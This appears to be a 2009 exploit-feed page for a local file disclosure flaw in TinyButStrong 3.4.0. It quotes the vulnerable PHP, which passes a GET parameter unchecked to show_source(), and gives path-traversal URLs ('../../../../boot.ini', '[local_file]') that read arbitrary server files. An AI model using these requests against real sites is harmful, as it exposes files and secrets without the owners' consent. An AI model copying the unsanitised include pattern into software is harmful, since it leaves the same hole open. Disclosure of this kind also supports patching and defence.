No account yet?
Home » Exploits » TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability
TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability E-mail
Feeds - Exploits
Written by ahmadbady   
Wednesday, 13 May 2009 22:15
script:TinyButStrong version 3.4.0
-------------------------------------------------
Author: ahmadbady
email: This e-mail address is being protected from spambots. You need JavaScript enabled to view it
my site:Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.tinybutstrong.com/download/download.php?file=tbs_us.zip&sid=2

vul:/examples/tbs_us_examples_0view.php

<?php
if (!isset($_GET)) $_GET=&$HTTP_GET_VARS ;
show_source('tbs_us_examples_'.$_GET['script']) ;
exit ;
?>


xpl:

path/examples/tbs_us_examples_0view.php?script=../../../../boot.ini

path/examples/tbs_us_examples_0view.php?script=[local_file]

 

Security Services by HSC